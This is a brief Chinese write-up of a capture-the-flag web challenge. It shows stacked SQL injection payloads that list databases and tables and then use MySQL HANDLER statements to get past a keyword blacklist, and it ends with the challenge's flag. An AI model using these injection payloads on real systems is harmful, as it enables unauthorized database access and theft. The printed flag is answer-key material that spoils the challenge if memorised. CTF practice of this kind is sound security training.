Buuctf-web-[GYCTF2020]Blacklist

首先随便注入一下

 

 

1';show databases;#　　//获取数据库名

1';show tables;#　　　　//获取表名

1’；desc `表名`　　　　//获取表结构

当我们再次使用修改字段名这种方式的时候，发现过滤了这些关键字，该怎么办呢

于是，我们查了百度，然后又学会了一个新姿势

HANDLER [表名] OPEN;语句打开一个表，使其可以使用后续HANDLER [表名] READ；该表对象未被其他会话共享，并且在会话调用HANDLER [表名] CLOSE;或会话终止之前不会关闭

1';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere close;#

执行这个，然后，就可以出来flag了

 

 

flag{7d92cf4a-b167-4a48-babe-1fc5ad19e472}